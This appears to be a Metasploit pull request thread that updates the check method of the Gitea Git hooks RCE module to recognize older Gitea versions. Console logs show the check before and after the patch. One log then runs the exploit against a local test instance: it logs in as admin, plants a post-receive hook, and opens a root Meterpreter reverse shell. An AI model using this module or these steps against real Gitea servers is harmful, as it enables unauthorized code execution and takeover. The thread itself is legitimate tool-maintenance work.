Update Gitea Git hooks RCE check method

[adfoster-r7]

Older versions of Gitea have a different version message than is currently supported:

The wording was changed here: go-gitea/gitea#9600

Before

When running the check method against a valid Gitea target, the 'Unsupported' check code is returned, which means the module doesn't support the check method - which is incorrect. Additionally doesn't identify the correct version of Gitea:

msf6 exploit(multi/http/gitea_git_hooks_rce) > check
[*] 10.10.168.148:31111 - This module does not support check. Target does not appear to be running Gitea.

After

Gitea is detected, and a check code which details the unknown version is returned:

msf6 exploit(multi/http/gitea_git_hooks_rce) > check
[*] 10.10.168.148:31111 - Cannot reliably check exploitability. Unknown Gitea version 38d8b8c.

It's worth noting that this change doesn't support non-english versions of Gitea.

Verification

Run an older version of Gitea, and replicate the testing steps here: #14978

[adfoster-r7]

cc @cdelafuente-r7 🕵️

[gwillcox-r7]

Before:

 ~/git/metasploit-framework │ master *1 ?34  ./msfconsole             ✔ │ 2.7.2 Ruby 
                                                  

                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .


       =[ metasploit v6.1.9-dev-0acef2285d                ]
+ -- --=[ 2168 exploits - 1149 auxiliary - 398 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Save the current environment with the 
save command, future console restarts will use this 
environment again

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/http/gitea_git_hooks_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gitea_git_hooks_rce) > set USERNAME test
USERNAME => test
msf6 exploit(multi/http/gitea_git_hooks_rce) > set PASSWORD test
PASSWORD => test
msf6 exploit(multi/http/gitea_git_hooks_rce) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 exploit(multi/http/gitea_git_hooks_rce) > check
[*] 127.0.0.1:3000 - This module does not support check. Target does not appear to be running Gitea.
msf6 exploit(multi/http/gitea_git_hooks_rce) > exit
 ~/git/metasploit-framework │ master *1 ?34     

[gwillcox-r7]

After with patch applied:

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/http/gitea_git_hooks_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gitea_git_hooks_rce) > set USERNAME test
USERNAME => test
msf6 exploit(multi/http/gitea_git_hooks_rce) > set PASSWORD test
PASSWORD => test
msf6 exploit(multi/http/gitea_git_hooks_rce) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 exploit(multi/http/gitea_git_hooks_rce) > show options

Module options (exploit/multi/http/gitea_git_hooks_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   test             yes       Password to use
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metas
                                         ploit
   RPORT      3000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   test             yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(multi/http/gitea_git_hooks_rce) > check
[*] 127.0.0.1:3000 - Cannot reliably check exploitability. Unknown Gitea version 6aacf4d.
msf6 exploit(multi/http/gitea_git_hooks_rce) > 

[gwillcox-r7]

And just to show this still works for exploitation purposes I logged in with admin credentials and disabled the AutoCheck check so that the exploit would run without raising an error:

msf6 exploit(multi/http/gitea_git_hooks_rce) > show options

Module options (exploit/multi/http/gitea_git_hooks_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   test             yes       Password to use
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metas
                                         ploit
   RPORT      3000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   test             yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(multi/http/gitea_git_hooks_rce) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf6 exploit(multi/http/gitea_git_hooks_rce) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Unknown Gitea version 6aacf4d. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/gitea_git_hooks_rce) > set AutoCheck false
AutoCheck => false
msf6 exploit(multi/http/gitea_git_hooks_rce) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Authenticate with "test/test"
[-] Exploit aborted due to failure: no-access: Login failed
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/gitea_git_hooks_rce) > set USERNAME masteradmin
USERNAME => masteradmin
msf6 exploit(multi/http/gitea_git_hooks_rce) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(multi/http/gitea_git_hooks_rce) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Authenticate with "masteradmin/admin"
[+] Logged in
[*] Create repository "Asoka_Overhold"
[+] Repository created
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created, shell incoming...
[*] Sending stage (3012548 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:53870) at 2021-10-04 15:41:30 -0500
[*] Command Stager progress - 100.00% done (833/833 bytes)
[*] Cleaning up
[*] Repository Asoka_Overhold deleted.

meterpreter > getuid
Server username: root
meterpreter > shell
Process 103515 created.
Channel 1 created.
sh: 0: getcwd() failed: No such file or directory
id
uid=0(root) gid=0(root) groups=0(root)

[gwillcox-r7]

For reference the version I tested that on was the earliest they had available, version 1.0.0. In case that helps at all.

[gwillcox-r7]

Release Notes

The check method for the Gitea Git hooks RCE module has been updated to correctly handle older versions of Gitea and report their exploitability as unknown vs reporting the target as not running Gitea.